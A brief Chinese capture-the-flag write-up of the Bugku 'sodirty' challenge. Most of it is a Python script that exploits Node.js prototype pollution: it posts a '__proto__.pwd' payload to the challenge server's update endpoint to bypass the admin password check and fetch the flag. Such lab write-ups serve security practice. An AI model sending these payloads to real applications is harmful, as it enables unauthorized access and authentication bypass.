Bugku-sodirty
node.js原型链污染
不是很理解
用dirsearch扫出后台后下载www.zip得到了源码,然后就是代码审计了...
挺懵逼的...
import requests
s = requests.session()
header = {'Content-Type': 'application/json'} # header类型必须设置为json
url = 'http://114.67.246.176:12216/'
r = s.get(url + 'reg') # 必须先注册,不然下一步会被重定向到reg
print(r.text)
payload1 = {'attrkey': '__proto__.pwd',
'attrval': '123'} # 增加原型链下一个object的pwd属性值为123,因为原型链一直会向下查找,所以可以找到Admin['pwd']属性的值
r = s.post(url=url + 'update', headers=header, json=payload1)
print(r.text)
payload2 = {'attrkey': 'age',
'attrval': '10'} # 修改年龄
r = s.post(url=url + 'update', headers=header, json=payload2)
print(r.text)
payload3 = {'key': 'pwd', 'password': '123'} # 传入key和password
r = s.post(url=url + 'getflag', headers=header, json=payload3)
print(r.text)